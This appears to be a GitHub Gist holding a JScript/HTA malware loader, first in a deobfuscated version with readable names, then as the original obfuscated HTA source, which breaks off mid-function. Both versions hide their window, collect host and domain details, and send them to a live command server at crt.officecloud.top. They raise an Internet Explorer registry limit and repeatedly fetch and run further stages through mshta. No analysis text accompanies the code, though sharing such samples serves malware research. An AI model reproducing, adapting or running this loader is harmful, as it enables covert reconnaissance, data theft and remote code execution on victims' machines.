Last active
August 13, 2020 09:24
-
-
Save Kristal-g/e0b6756bb5610470e78d892251cefbf6 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
window.moveTo(-105, 300); | |
window.blur(); | |
window.resizeTo(10, 15); | |
try { | |
window.onerror = function(sMsg, sUrl, sLine) { | |
return false; | |
} | |
window.onfocus = function() { | |
window.blur(); | |
} | |
} catch (e) {} | |
var mainFuncStruct = {}; | |
function reverseString(s) { | |
return s.split("").reverse().join(""); | |
} | |
mainFuncStruct.fileObj = new ActiveXObject("Scrip" + "ting.FileSystemOb" + "ject"); | |
mainFuncStruct.shellObj = new ActiveXObject("WScrip" + "t.S" + "hell"); | |
mainFuncStruct.cncDomain = "http://crt.officecloud.top/st"; | |
mainFuncStruct.maybeToken = "REDACTED"; | |
mainFuncStruct.emptyIfFirstRun = ""; | |
mainFuncStruct.someCNCUrl = "http://crt.officecloud.top/st?vsxceymxlslzeqx=REDACTED"; | |
mainFuncStruct.highNumber = "999999999999999"; | |
mainFuncStruct.callbackAfterTimeout = function(ms, callback) { | |
if (mainFuncStruct.isRunningInMshta()) { | |
window.setTimeout(callback, ms); | |
} else { | |
var now = new Date().getTime(); | |
while (new Date().getTime() < now + ms); | |
callback(); | |
} | |
} | |
mainFuncStruct.killSelf = function() { | |
if (mainFuncStruct.isRunningInMshta()) { | |
try { | |
window["close"](); | |
} catch (e) {} | |
try { | |
window.self["close"](); | |
} catch (e) {} | |
try { | |
window.top["close"](); | |
} catch (e) {} | |
try { | |
self["close"](); | |
} catch (e) {} | |
try { | |
window.open('', '_self', ''); | |
window["close"](); | |
} catch (e) {} | |
} | |
try { | |
WScript.quit(); | |
} catch (e) {} | |
try { | |
var pid = mainFuncStruct.funcStruct1.getOwnPID(); | |
mainFuncStruct.funcStruct1.terminateProcessByPID(pid); | |
} catch (e) {} | |
} | |
mainFuncStruct.isRunningInMshta = function() { | |
return typeof(window) !== "undefined"; | |
} | |
mainFuncStruct.checkIfWscriptDefined = function() { | |
return typeof(WScript) !== "undefined"; | |
} | |
mainFuncStruct.maybeGenGUID = function() { | |
try { | |
function s4() { | |
return Math.floor((1 + Math.random()) * 0x1235612).toString(16).substring(1); | |
} | |
return s4() + s4() + '-' + s4() + s4() + '-' + s4() + '-' + | |
s4() + '-' + s4() + s4() + s4(); | |
} catch (e) {} | |
} | |
mainFuncStruct.funcStruct4 = {}; | |
mainFuncStruct.funcStruct4.getSessions = function() { | |
try { | |
var res = mainFuncStruct.funcStruct3.runCmdToFile("(net1 session || echo ofailur)", "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".log"); | |
if (res.indexOf("ofailur") == -1) { | |
return true; | |
} | |
return false; | |
} catch (e) { | |
return false; | |
} | |
} | |
mainFuncStruct.funcStruct4.readOsVersion = function() { | |
try { | |
var osver = mainFuncStruct.shellObj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName"); | |
var osbuild = mainFuncStruct.shellObj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentBuildNumber"); | |
return osver + "triplestar" + osbuild; | |
} catch (e) {} | |
return "Unknown"; | |
} | |
mainFuncStruct.funcStruct4.getDCName = function() { | |
try { | |
var DC = mainFuncStruct.shellObj.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName"); | |
if (DC.length > 0) { | |
return DC; | |
} | |
} catch (e) {} | |
return "Unknown"; | |
} | |
mainFuncStruct.funcStruct4.getArch = function() { | |
try { | |
var arch = mainFuncStruct.shellObj.RegRead("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\\PROCESSOR_ARCHITECTURE"); | |
return arch; | |
} catch (e) {} | |
return "Unknown"; | |
} | |
mainFuncStruct.funcStruct4.cdToTempFolder = function() { | |
try { | |
var truew = mainFuncStruct.funcStruct3.runCmdToFile("cd", "%TEMP%\\truew.tmp"); | |
return truew; | |
} catch (e) {} | |
return ""; | |
} | |
mainFuncStruct.funcStruct4.getRoutingInfo = function() { | |
try { | |
var routeprint4 = mainFuncStruct.funcStruct3.runCmdToFile("route PRINT -4", "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".log"); | |
var res = routeprint4.split("\r\n"); | |
for (var i = 0; i < res.length; i++) { | |
line = res[i].split(" "); | |
zerocount = 0; | |
itemcount = 0; | |
correctflag = false; | |
for (var j = 0; j < line.length; j++) { | |
if (line[j]) { | |
itemcount += 1; | |
if (itemcount == 4 && correctflag) { | |
return line[j]; | |
} | |
} | |
if (line[j] == "0.0.0.0") { | |
zerocount += 1; | |
if (zerocount == 2) { | |
correctflag = true; | |
} | |
} | |
} | |
} | |
} catch (e) {} | |
return ""; | |
} | |
mainFuncStruct.funcStruct4.getComputerInfo = function() { | |
var net = new ActiveXObject("WScript.Network"); | |
var domain = ""; | |
if (net.UserDomain.length != 0) { | |
domain = net.UserDomain; | |
} else { | |
try { | |
domain = mainFuncStruct.funcStruct3.runCmdToFile("echo %userdomain%", "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".log"); | |
} catch (h) {} finally { | |
domain = domain.split(" \r\n")[0]; | |
} | |
} | |
var info = domain + "\\" + net.Username; | |
if (mainFuncStruct.funcStruct4.getSessions()) | |
info += "*"; | |
info += " n0body i know " + net.ComputerName; | |
info += " n0body i know " + mainFuncStruct.funcStruct4.readOsVersion(); | |
info += " n0body i know " + mainFuncStruct.funcStruct4.getDCName(); | |
info += " n0body i know " + mainFuncStruct.funcStruct4.getArch(); | |
info += " n0body i know " + mainFuncStruct.funcStruct4.cdToTempFolder(); | |
info += " n0body i know " + mainFuncStruct.funcStruct4.getRoutingInfo(); | |
info += " n0body i know " + mainFuncStruct.funcStruct4.chcp(); | |
info += " n0body i know " + mainFuncStruct.funcStruct4.getSomeCodePageNum(); | |
return info; | |
} | |
mainFuncStruct.funcStruct4.chcp = function() { | |
try { | |
return "1252" | |
} catch (e) { | |
return "1252"; | |
} | |
} | |
mainFuncStruct.funcStruct4.getSomeCodePageNum = function() { | |
try { | |
return "1252" | |
} catch (e) { | |
return "437"; | |
} | |
} | |
mainFuncStruct.funcStruct6 = {}; | |
mainFuncStruct.funcStruct6.sendDataToCNC = function(data, headers) { | |
return mainFuncStruct.funcStruct7.sendHTTPRequest(mainFuncStruct.funcStruct6.getCncWithJobURL(), data, headers); | |
} | |
mainFuncStruct.funcStruct6.sendErrorDataToCNC = function(e) { | |
try { | |
var headers = {}; | |
headers["errno"] = (e.number) ? e.number : "-1"; | |
headers["errname"] = (e.name) ? e.name : "Unknown"; | |
headers["errdesc"] = (e.description) ? e.description : "Unknown"; | |
return mainFuncStruct.funcStruct6.sendDataToCNC(e.message, headers); | |
} catch (e) {} | |
} | |
mainFuncStruct.funcStruct6.getCncWithJobURL = function(jobkey) { | |
var jobkey = (typeof(jobkey) !== "undefined") ? jobkey : mainFuncStruct.emptyIfFirstRun; | |
return mainFuncStruct.someCNCUrl + jobkey + "&"; | |
} | |
mainFuncStruct.funcStruct6.sendHTTPRequestEmpty = function() { | |
var url = mainFuncStruct.funcStruct6.getCncWithJobURL(); | |
return mainFuncStruct.funcStruct7.sendHTTPRequest(url); | |
} | |
mainFuncStruct.funcStruct6.runMshtaFromCNC = function(jobkey, fork32Bit) { | |
var fork32Bit = (typeof(fork32Bit) !== "undefined") ? fork32Bit : false; | |
var cmd = "mshta stelsy"; | |
if (fork32Bit) | |
cmd = mainFuncStruct.funcStruct2.getSystemFolder() + cmd; | |
cmd = cmd.replace("stelsy", mainFuncStruct.funcStruct6.getCncWithJobURL(jobkey)); | |
try { | |
mainFuncStruct.funcStruct6.createProcessReturnPID(cmd); | |
} catch (e) { | |
mainFuncStruct.shellObj.Run(cmd, 0, false); | |
} | |
} | |
mainFuncStruct.funcStruct7 = {}; | |
mainFuncStruct.funcStruct7.getHttpRequestObj = function() { | |
var http = null; | |
try { | |
http = new ActiveXObject("Msxml2.ServerXMLH" + "TTP.6.0"); | |
http.setTimeouts(~~[], ~~[], ~~[], ~~[]); | |
} catch (e) { | |
http = new ActiveXObject("WinHttp.WinHttpRe" + "quest.5.1"); | |
http.setTimeouts(0x7530, 0x7530, 0x7530, ~~[]); | |
} | |
return http; | |
} | |
mainFuncStruct.funcStruct7.setRequestHTTPHeaders = function(http, headers) { | |
var headers = (typeof(headers) !== "undefined") ? headers : {}; | |
var content = false; | |
for (var key in headers) { | |
try { | |
var value = headers[key]; | |
http.setRequestHeader(key, value); | |
} catch (h) {} finally { | |
if (key.toUpperCase() == "CONTENT-TYPE") | |
content = true; | |
} | |
} | |
if (!content) | |
http["setR" + "eque" + "stH" + "eader"]("Content-Type", "application/json"); | |
} | |
mainFuncStruct.funcStruct7.sendHTTPRequest = function(url, data, headers) { | |
var data = (typeof(data) !== "undefined") ? data : ""; | |
var http = mainFuncStruct.funcStruct7.getHttpRequestObj(); | |
http.open("POST", url, false); | |
mainFuncStruct.funcStruct7.setRequestHTTPHeaders(http, headers); | |
http.send(data); | |
return http; | |
} | |
mainFuncStruct.funcStruct7.sendHTTPRequestEmpty = function(url, headers) { | |
var http = mainFuncStruct.funcStruct7.getHttpRequestObj(); | |
http["op" + "en"]("GET", url, false); | |
mainFuncStruct.funcStruct7.setRequestHTTPHeaders(http, headers); | |
http["se" + "nd"](); | |
return http; | |
} | |
mainFuncStruct.funcStruct1 = {}; | |
mainFuncStruct.funcStruct1.getOwnPID = function() { | |
var cmd = mainFuncStruct.funcStruct2.expandEnvStrings("%comspec% /K hostname"); | |
var childPid = mainFuncStruct.funcStruct6.createProcessReturnPID(cmd); | |
var pid = -1; | |
var latestTime = 0; | |
var latestProc = null; | |
var processes = mainFuncStruct.funcStruct1.getProcessList(); | |
var items = new Enumerator(processes); | |
while (!items.atEnd()) { | |
var proc = items.item(); | |
try { | |
if (proc.ProcessId == childPid) { | |
latestProc = proc; | |
break; | |
} | |
} catch (e) {} | |
items.moveNext(); | |
} | |
pid = latestProc.ParentProcessId; | |
latestProc.Terminate(); | |
return pid; | |
} | |
mainFuncStruct.funcStruct1.terminateProcessByPID = function(pid) { | |
var processes = mainFuncStruct.funcStruct1.getProcessList(); | |
var items = new Enumerator(processes); | |
while (!items.atEnd()) { | |
var proc = items.item(); | |
try { | |
if (proc.ProcessId == pid) { | |
proc.Terminate(); | |
return true; | |
} | |
} catch (e) {} | |
items.moveNext(); | |
} | |
return false; | |
} | |
mainFuncStruct.funcStruct1.getProcessList = function() { | |
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2"); | |
var query = "Select * From Win32_Process"; | |
return wmi.ExecQuery(query); | |
} | |
mainFuncStruct.funcStruct5 = {}; | |
mainFuncStruct.funcStruct5.HKEY_CLASSES_ROOT = 0x80000000; | |
mainFuncStruct.funcStruct5.HKCU = 0x80000001; | |
mainFuncStruct.funcStruct5.HKLM = 0x80000002; | |
mainFuncStruct.funcStruct5.REG_STRING = 0; | |
mainFuncStruct.funcStruct5.REG_BINARY = 1; | |
mainFuncStruct.funcStruct5.REG_DWORD = 2; | |
mainFuncStruct.funcStruct5.REG_QWORD = 3; | |
mainFuncStruct.funcStruct5.getWmiRegistryObject = function(computer) { | |
var computer = (typeof(computer) !== "undefined") ? computer : "."; | |
var reg = GetObject("winmgmts:\\\\" + computer + "\\root\\default:StdRegProv"); | |
return reg; | |
} | |
mainFuncStruct.funcStruct5.setRegistryValue = function(hKey, path, key, value, valType, computer) { | |
var reg = mainFuncStruct.funcStruct5.getWmiRegistryObject(computer); | |
reg.CreateKey(hKey, path); | |
if (valType == mainFuncStruct.funcStruct5.REG_STRING) | |
reg.SetStringValue(hKey, path, key, value); | |
else if (valType == mainFuncStruct.funcStruct5.REG_DWORD) | |
reg.SetDWORDValue(hKey, path, key, value); | |
else if (valType == mainFuncStruct.funcStruct5.REG_QWORD) | |
reg.SetQWORDValue(hKey, path, key, value); | |
else if (valType == mainFuncStruct.funcStruct5.REG_BINARY) | |
reg.SetBinaryValue(hKey, path, key, value); | |
} | |
mainFuncStruct.funcStruct6 = {}; | |
mainFuncStruct.funcStruct6.createProcessReturnPID = function(cmd) { | |
var SW_HIDE = 0; | |
var pid = 0; | |
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2") | |
var si = wmi.Get("Win32_ProcessStartup").SpawnInstance_(); | |
si.ShowWindow = SW_HIDE; | |
si.CreateFlags = 16777216; | |
si.X = si.Y = si.XSize = si.ySize = 1; | |
var w32proc = wmi.Get("Win32_Process"); | |
var method = w32proc.Methods_.Item("Create"); | |
var inParams = method.InParameters.SpawnInstance_(); | |
inParams.CommandLine = cmd; | |
inParams.CurrentDirectory = null; | |
inParams.ProcessStartupInformation = si; | |
var outParams = w32proc.ExecMethod_("Create", inParams); | |
return outParams.ProcessId; | |
} | |
mainFuncStruct.funcStruct3 = {}; | |
mainFuncStruct.funcStruct3.runCmdToFile = function(cmd, stdOutPath) { | |
cmd = "chcp " + mainFuncStruct.funcStruct4.getSomeCodePageNum() + " & " + cmd; | |
var c = "cmd /c %c^oms^pec%^ /q /c " + cmd + " 1> " + mainFuncStruct.funcStruct2.expandEnvStrings(stdOutPath); | |
c += " 2>&1"; | |
mainFuncStruct.shellObj.Run(c, 0, true); | |
if (mainFuncStruct.funcStruct4.chcp() == "936") { | |
var data = mainFuncStruct.funcStruct2.readFileUntilSuccess(stdOutPath); | |
} else { | |
var data = mainFuncStruct.funcStruct2.readFileUntilSuccess2(stdOutPath); | |
} | |
mainFuncStruct.funcStruct2.shellDeleteFile(stdOutPath); | |
return data; | |
} | |
mainFuncStruct.funcStruct3.shellRunCommand = function(cmd, fork) { | |
var fork = (typeof(fork) !== "undefined") ? fork : true; | |
var c = "cmd /c %c^oms^pe^c% /q /c " + cmd; | |
mainFuncStruct.shellObj.Run(cmd, 5 - 5, !fork); | |
} | |
mainFuncStruct.funcStruct2 = {}; | |
mainFuncStruct.funcStruct2.expandEnvStrings = function(path) { | |
return mainFuncStruct.shellObj.ExpandEnvironmentStrings(path); | |
} | |
mainFuncStruct.funcStruct2.getSystemFolder = function() { | |
var base = mainFuncStruct.funcStruct2.expandEnvStrings("%WINDIR%"); | |
var syswow64 = base + "\\SysWOW64\\"; | |
if (mainFuncStruct.fileObj.FolderExists(syswow64)) | |
return syswow64; | |
return base + "\\System32\\"; | |
} | |
mainFuncStruct.funcStruct2.readFileUntilSuccess = function(path) { | |
var loopcount = 0; | |
while (true) { | |
if (mainFuncStruct.fileObj.FileExists(mainFuncStruct.funcStruct2.expandEnvStrings(path)) && mainFuncStruct.fileObj.GetFile(mainFuncStruct.funcStruct2.expandEnvStrings(path)).Size > 0) { | |
try { | |
var fd = mainFuncStruct.fileObj.OpenTextFile(mainFuncStruct.funcStruct2.expandEnvStrings(path), 1, false, 0); | |
var data = fd.ReadAll(); | |
fd.Close(); | |
return data; | |
} catch (e) { | |
mainFuncStruct.funcStruct3.shellRunCommand("ping 127." + "0.0.1 -n 2", false); | |
continue; | |
} | |
} else { | |
loopcount += 1; | |
if (loopcount > 180) { | |
return ""; | |
} | |
mainFuncStruct.funcStruct3.shellRunCommand("ping 127." + "0.0.1 -n 2", false); | |
} | |
} | |
} | |
mainFuncStruct.funcStruct2.readFileUntilSuccess2 = function(path, exists, certutil) { | |
var exists = (typeof(exists) !== "undefined") ? exists : false; | |
var certutil = (typeof(certutil) !== "undefined") ? certutil : false; | |
if (!mainFuncStruct.fileObj.FileExists(mainFuncStruct.funcStruct2.expandEnvStrings(path)) && exists) { | |
var headers = {}; | |
headers["Sta" + "tus"] = "Not" + "Exist"; | |
mainFuncStruct.funcStruct6.sendDataToCNC("", headers); | |
return ""; | |
} | |
var loopcount = 0; | |
while (true) { | |
if (mainFuncStruct.fileObj.FileExists(mainFuncStruct.funcStruct2.expandEnvStrings(path)) && mainFuncStruct.fileObj.GetFile(mainFuncStruct.funcStruct2.expandEnvStrings(path)).Size > 0) { | |
if (mainFuncStruct.funcStruct4.chcp() == "936" || certutil) { | |
var newout = "%TEMP%\\" + mainFuncStruct.maybeGenGUID() + ".l" + "og"; | |
mainFuncStruct.funcStruct3.shellRunCommand("certut" + "il -encode " + mainFuncStruct.funcStruct2.expandEnvStrings(path) + " " + newout); | |
var data = mainFuncStruct.funcStruct2.readFileUntilSuccess(newout); | |
mainFuncStruct.funcStruct2.shellDeleteFile(newout); | |
} else { | |
var fp = mainFuncStruct.fileObj.GetFile(mainFuncStruct.funcStruct2.expandEnvStrings(path)); | |
var fd = fp.OpenAsTextStream(); | |
var data = fd.read(fp.Size); | |
fd.close(); | |
} | |
return data; | |
} else { | |
loopcount += 1; | |
if (loopcount > 180) { | |
return ""; | |
} | |
mainFuncStruct.funcStruct3.shellRunCommand("ping 127." + "0.0.1 -n 2", false); | |
} | |
} | |
} | |
mainFuncStruct.funcStruct2.shellDeleteFile = function(path) { | |
mainFuncStruct.fileObj.DeleteFile(mainFuncStruct.funcStruct2.expandEnvStrings(path), true); | |
}; | |
try { | |
if (mainFuncStruct.emptyIfFirstRun != "prfx") { | |
if (mainFuncStruct.isRunningInMshta()) { | |
var path = "SOFT" + "WARE\\Mi" + "crosoft\\I" + "nternet Explor" + "er\\St" + "yles"; | |
var key = "Ma" + "xScriptStat" + "ements"; | |
mainFuncStruct.funcStruct5.setRegistryValue(mainFuncStruct.funcStruct5.HKCU, path, key, 0xFFFFFFFF, mainFuncStruct.funcStruct5.REG_DWORD); | |
} | |
mainFuncStruct.funcStruct6.sendDataToCNC(mainFuncStruct.funcStruct4.getComputerInfo()); | |
try { | |
mainFuncStruct.funcStruct6.runMshtaFromCNC(""); | |
} catch (e) { | |
mainFuncStruct.funcStruct6.sendErrorDataToCNC(e) | |
} | |
mainFuncStruct.killSelf(); | |
} else { | |
if (mainFuncStruct.isRunningInMshta()) | |
LimitedRunLoop(); | |
else | |
InfiniteRunLoop(); | |
} | |
} catch (e) { | |
mainFuncStruct.funcStruct6.sendErrorDataToCNC(e); | |
} | |
function CanHelp() { | |
var epoch = new Date().getTime(); | |
var expire = parseInt(mainFuncStruct.highNumber); | |
if (epoch > expire) { | |
return 0; | |
} | |
try { | |
var work = mainFuncStruct.funcStruct6.sendHTTPRequestEmpty(); | |
if (work.status == 201 || work.status == 202 || work.status == 200) { | |
if (work.responseText.length > 0) { | |
var jobkey = work.responseText; | |
mainFuncStruct.funcStruct6.runMshtaFromCNC(jobkey, work.status == 202); | |
} | |
} else { | |
return 0; | |
} | |
} catch (e) { | |
return 0; | |
} | |
return 1; | |
} | |
function InfiniteRunLoop() { | |
var an = "undefined"; | |
while (CanHelp()); | |
mainFuncStruct.killSelf(); | |
} | |
function LimitedRunLoop() { | |
var sn = "undefined"; | |
for (var i = (1 - 1); i < (5 * 5 - 15); ++i) { | |
if (!CanHelp()) { | |
mainFuncStruct.killSelf(); | |
return; | |
} | |
} | |
if (sn == "undefined") { | |
mainFuncStruct.funcStruct6.runMshtaFromCNC(""); | |
mainFuncStruct.killSelf(); | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<head> | |
<hta:application caption="no" windowState="minimize" showInTaskBar="no" scroll="no" navigable="no" /> | |
<script language="JScript"> | |
window.moveTo(-105,300);window.blur();window.resizeTo(10,15);try | |
{window.onerror=function(sMsg,sUrl,sLine){return false;} | |
window.onfocus=function(){window.blur();}} | |
catch(e){} | |
var USZOOYWIZS={};function rsS(s){return s.split("").reverse().join("");} | |
USZOOYWIZS.BZIYSEPGNF=new ActiveXObject("Scrip"+rsS("bOmetsySeliF.gnit")+"ject");USZOOYWIZS.VYAUWFCEQB=new ActiveXObject("WScrip"+"t.S"+rsS("lleh"));USZOOYWIZS.PALBTPZSUF="http://crt.officecloud.top/st";USZOOYWIZS.BZZUUCGDQU="REDACTED";USZOOYWIZS.TNHTOGCTIG="";USZOOYWIZS.JPOWZJFUNB="http://crt.officecloud.top/st?vsxceymxlslzeqx=REDACTED";USZOOYWIZS.HIJJAGKENR="999999999999999";USZOOYWIZS.GGIAVPXSTH=function(ms,callback) | |
{if(USZOOYWIZS.DYPJQVFPFC()) | |
{window.setTimeout(callback,ms);} | |
else | |
{var now=new Date().getTime();while(new Date().getTime()<now+ms);callback();}} | |
USZOOYWIZS.IQSPUIAMOB=function() | |
{if(USZOOYWIZS.DYPJQVFPFC()) | |
{try{window["close"]();}catch(e){} | |
try{window.self["close"]();}catch(e){} | |
try{window.top["close"]();}catch(e){} | |
try{self["close"]();}catch(e){} | |
try | |
{window.open('','_self','');window["close"]();} | |
catch(e) | |
{}} | |
try | |
{WScript.quit();} | |
catch(e) | |
{} | |
try | |
{var pid=USZOOYWIZS.ERDXQCZMRN.LLXQUFFVDG();USZOOYWIZS.ERDXQCZMRN.IVRPZFVXMC(pid);} | |
catch(e) | |
{}} | |
USZOOYWIZS.DYPJQVFPFC=function() | |
{return typeof(window)!==rsS("denifednu");} | |
USZOOYWIZS.XTERINGOBR=function() | |
{return typeof(WScript)!==rsS("denifednu");} | |
USZOOYWIZS.SFULCEKQPJ=function() | |
{try | |
{function s4() | |
{return Math.floor((1+Math.random())*0x1235612).toString(16).substring(1);} | |
return s4()+s4()+'-'+s4()+s4()+'-'+s4()+'-'+ | |
s4()+'-'+s4()+s4()+s4();} | |
catch(e) | |
{}} | |
USZOOYWIZS.FSZGCSETMH={};USZOOYWIZS.FSZGCSETMH.JPWKKYVEDQ=function() | |
{try | |
{var res=USZOOYWIZS.PUZLNFITWY.GXJDCREARQ("(net1 session || echo ofailur)","%TEMP%\\"+USZOOYWIZS.SFULCEKQPJ()+".log");if(res.indexOf("ofailur")==-1) | |
{return true;} | |
return false;} | |
catch(e) | |
{return false;}} | |
USZOOYWIZS.FSZGCSETMH.MKBDEIYCYP=function() | |
{try | |
{var osver=USZOOYWIZS.VYAUWFCEQB.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");var osbuild=USZOOYWIZS.VYAUWFCEQB.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentBuildNumber");return osver+"triplestar"+osbuild;} | |
catch(e){} | |
return"Unknown";} | |
USZOOYWIZS.FSZGCSETMH.CSZTZBQMQU=function() | |
{try | |
{var DC=USZOOYWIZS.VYAUWFCEQB.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName");if(DC.length>0) | |
{return DC;}} | |
catch(e) | |
{} | |
return"Unknown";} | |
USZOOYWIZS.FSZGCSETMH.GTTECATTBE=function() | |
{try | |
{var arch=USZOOYWIZS.VYAUWFCEQB.RegRead("HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\\PROCESSOR_ARCHITECTURE");return arch;} | |
catch(e){} | |
return"Unknown";} | |
USZOOYWIZS.FSZGCSETMH.AYRFPFYDFU=function() | |
{try | |
{var truew=USZOOYWIZS.PUZLNFITWY.GXJDCREARQ("cd","%TEMP%\\truew.tmp");return truew;} | |
catch(e) | |
{} | |
return"";} | |
USZOOYWIZS.FSZGCSETMH.PPYJMBWCSC=function() | |
{try | |
{var routeprint4=USZOOYWIZS.PUZLNFITWY.GXJDCREARQ("route PRINT -4","%TEMP%\\"+USZOOYWIZS.SFULCEKQPJ()+".log");var res=routeprint4.split("\r\n");for(var i=0;i<res.length;i++) | |
{line=res[i].split(" ");zerocount=0;itemcount=0;correctflag=false;for(var j=0;j<line.length;j++) | |
{if(line[j]) | |
{itemcount+=1;if(itemcount==4&&correctflag){return line[j];}} | |
if(line[j]=="0.0.0.0") | |
{zerocount+=1;if(zerocount==2) | |
{correctflag=true;}}}}} | |
catch(e) | |
{} | |
return"";} | |
USZOOYWIZS.FSZGCSETMH.IAPTOFSEZA=function() | |
{var net=new ActiveXObject("WScript.Network");var domain="";if(net.UserDomain.length!=0) | |
{domain=net.UserDomain;} | |
else | |
{try{domain=USZOOYWIZS.PUZLNFITWY.GXJDCREARQ("echo %userdomain%","%TEMP%\\"+USZOOYWIZS.SFULCEKQPJ()+".log");}catch(h){}finally{domain=domain.split(" \r\n")[0];}} | |
var info=domain+"\\"+net.Username;if(USZOOYWIZS.FSZGCSETMH.JPWKKYVEDQ()) | |
info+="*";info+=" n0body i know "+net.ComputerName;info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.MKBDEIYCYP();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.CSZTZBQMQU();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.GTTECATTBE();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.AYRFPFYDFU();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.PPYJMBWCSC();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.EVOWWBMQYM();info+=" n0body i know "+USZOOYWIZS.FSZGCSETMH.RLUXESGUDE();return info;} | |
USZOOYWIZS.FSZGCSETMH.EVOWWBMQYM=function() | |
{try | |
{return"1252"} | |
catch(e) | |
{return"1252";}} | |
USZOOYWIZS.FSZGCSETMH.RLUXESGUDE=function() | |
{try | |
{return"1252"} | |
catch(e) | |
{return"437";}} | |
USZOOYWIZS.JLOOXOZDZT={};USZOOYWIZS.JLOOXOZDZT.FEQUSOEKAK=function(data,headers) | |
{return USZOOYWIZS.KTFJHNZIRI.JHFPHAPALS(USZOOYWIZS.JLOOXOZDZT.KPUKINKNPO(),data,headers);} | |
USZOOYWIZS.JLOOXOZDZT.ENNXSOYMMH=function(e) | |
{try | |
{var headers={};headers["errno"]=(e.number)?e.number:"-1";headers["errname"]=(e.name)?e.name:"Unknown";headers["errdesc"]=(e.description)?e.description:"Unknown";return USZOOYWIZS.JLOOXOZDZT.FEQUSOEKAK(e.message,headers);} | |
catch(e) | |
{}} | |
USZOOYWIZS.JLOOXOZDZT.KPUKINKNPO=function(jobkey) | |
{var jobkey=(typeof(jobkey)!=="undefined")?jobkey:USZOOYWIZS.TNHTOGCTIG;return USZOOYWIZS.JPOWZJFUNB+jobkey+"&";} | |
USZOOYWIZS.JLOOXOZDZT.KEYOMPGODE=function() | |
{var url=USZOOYWIZS.JLOOXOZDZT.KPUKINKNPO();return USZOOYWIZS.KTFJHNZIRI.JHFPHAPALS(url);} | |
USZOOYWIZS.JLOOXOZDZT.MMTQDJLVYX=function(jobkey,fork32Bit) | |
{var fork32Bit=(typeof(fork32Bit)!=="undefined")?fork32Bit:false;var cmd="mshta stelsy";if(fork32Bit) | |
cmd=USZOOYWIZS.WXUXMBSDFO.KKJQGQQLNJ()+cmd;cmd=cmd.replace("stelsy",USZOOYWIZS.JLOOXOZDZT.KPUKINKNPO(jobkey));try{USZOOYWIZS.CMXWOMTDOO.UUNAMVWTME(cmd);}catch(e){USZOOYWIZS.VYAUWFCEQB.Run(cmd,0,false);}} | |
USZOOYWIZS.KTFJHNZIRI={};USZOOYWIZS.KTFJHNZIRI.PQXJNPIPNZ=function() | |
{var http=null;try | |
{http=new ActiveXObject(rsS("HLMXrevreS.2lmxsM")+"TTP.6.0");http.setTimeouts(~~[],~~[],~~[],~~[]);} | |
catch(e) | |
{http=new ActiveXObject(rsS("eRpttHniW.pttHniW")+"quest.5.1");http.setTimeouts(0x7530,0x7530,0x7530,~~[]);} | |
return http;} | |
USZOOYWIZS.KTFJHNZIRI.PQXCRNIAHD=function(http,headers) | |
{var headers=(typeof(headers)!=="undefined")?headers:{};var content=false;for(var key in headers) | |
{try{var value=headers[key];http.setRequestHeader(key,value);}catch(h){}finally{if(key.toUpperCase()=="CONTENT-TYPE") | |
content=true;}} | |
if(!content) | |
http[rsS("Rtes")+"eque"+rsS("Hts")+"eader"]("Content-Type","application/json");} | |
USZOOYWIZS.KTFJHNZIRI.JHFPHAPALS=function(url,data,headers) | |
{var data=(typeof(data)!=="undefined")?data:"";var http=USZOOYWIZS.KTFJHNZIRI.PQXJNPIPNZ();http.open("POST",url,false);USZOOYWIZS.KTFJHNZIRI.PQXCRNIAHD(http,headers);http.send(data);return http;} | |
USZOOYWIZS.KTFJHNZIRI.KEYOMPGODE=function(url,headers) | |
{var http=USZOOYWIZS.KTFJHNZIRI.PQXJNPIPNZ();http[rsS("po")+"en"]("GET",url,false);USZOOYWIZS.KTFJHNZIRI.PQXCRNIAHD(http,headers);http[rsS("es")+"nd"]();return http;} | |
USZOOYWIZS.ERDXQCZMRN={};USZOOYWIZS.ERDXQCZMRN.LLXQUFFVDG=function() | |
{var cmd=USZOOYWIZS.WXUXMBSDFO.QUMMKJWDNW("%comspec% /K hostname");var childPid=USZOOYWIZS.CMXWOMTDOO.UUNAMVWTME(cmd);var pid=-1;var latestTime=0;var latestProc=null;var processes=USZOOYWIZS.ERDXQCZMRN.ZYGNWLRIBN();var items=new Enumerator(processes);while(!items.atEnd()) | |
{var proc=items.item();try | |
{if(proc.ProcessId==childPid) | |
{latestProc=proc;break;}}catch(e) | |
{} | |
items.moveNext();} | |
pid=latestProc.ParentProcessId;latestProc.Terminate();return pid;} | |
USZOOYWIZS.ERDXQCZMRN.IVRPZFVXMC=function(pid) | |
{var processes=USZOOYWIZS.ERDXQCZMRN.ZYGNWLRIBN();var items=new Enumerator(processes);while(!items.atEnd()) | |
{var proc=items.item();try | |
{if(proc.ProcessId==pid) | |
{proc.Terminate();return true;}}catch(e) | |
{} | |
items.moveNext();} | |
return false;} | |
USZOOYWIZS.ERDXQCZMRN.ZYGNWLRIBN=function() | |
